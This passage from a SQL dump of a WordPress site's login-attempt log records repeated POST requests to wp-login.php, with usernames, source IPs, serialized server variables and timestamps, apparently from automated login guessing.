REQUEST_TIME_FLOAT\";d:1746050900.852581;s:12:\"REQUEST_TIME\";i:1746050900;}}','78.155.192.110',0,'2025-05-01 03:38:22','1970-01-01 00:00:00'),(94707,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"117\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54525\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"117\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746050904.248095;s:12:\"REQUEST_TIME\";i:1746050904;}}','196.251.112.104',1,'2025-05-01 03:38:25','2025-05-02 03:41:30'),(94708,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54526\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746050904.2802539;s:12:\"REQUEST_TIME\";i:1746050904;}}','196.251.112.104',1,'2025-05-01 03:38:26','2025-05-02 03:41:30'),(94709,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54527\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746050904.2811999;s:12:\"REQUEST_TIME\";i:1746050904;}}','196.251.112.104',1,'2025-05-01 03:38:26','2025-05-02 03:41:30'),(94710,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54531\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746050904.312767;s:12:\"REQUEST_TIME\";i:1746050904;}}','196.251.112.104',1,'2025-05-01 03:38:26','2025-05-02 03:41:30'),(94711,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54529\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746050904.311893;s:12:\"REQUEST_TIME\";i:1746050904;}}','196.251.112.104',1,'2025-05-01 03:38:26','2025-05-02 03:41:30'),(94712,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54422\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746051089.092021;s:12:\"REQUEST_TIME\";i:1746051089;}}','196.251.112.104',1,'2025-05-01 03:41:30','2025-05-02 03:41:30'),(94713,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"117\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54421\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"117\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746051089.069736;s:12:\"REQUEST_TIME\";i:1746051089;}}','196.251.112.104',1,'2025-05-01 03:41:30','2025-05-02 03:41:30'),(94714,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54425\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746051089.113035;s:12:\"REQUEST_TIME\";i:1746051089;}}','196.251.112.104',1,'2025-05-01 03:41:30','2025-05-02 03:41:30'),(94715,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54423\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746051089.1019931;s:12:\"REQUEST_TIME\";i:1746051089;}}','196.251.112.104',1,'2025-05-01 03:41:30','2025-05-02 03:41:30'),(94716,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54426\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746051089.1300621;s:12:\"REQUEST_TIME\";i:1746051089;}}','196.251.112.104',1,'2025-05-01 03:41:30','2025-05-02 03:41:30'),(94717,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"sv-SE,sv;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, br, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"59734\";s:11:\"REMOTE_ADDR\";s:12:\"185.61.152.8\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746051513.2253389;s:12:\"REQUEST_TIME\";i:1746051513;}}','185.61.152.8',0,'2025-05-01 03:48:35','1970-01-01 00:00:00'),(94718,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ja-JP,ja;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"38740\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.114.98\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"S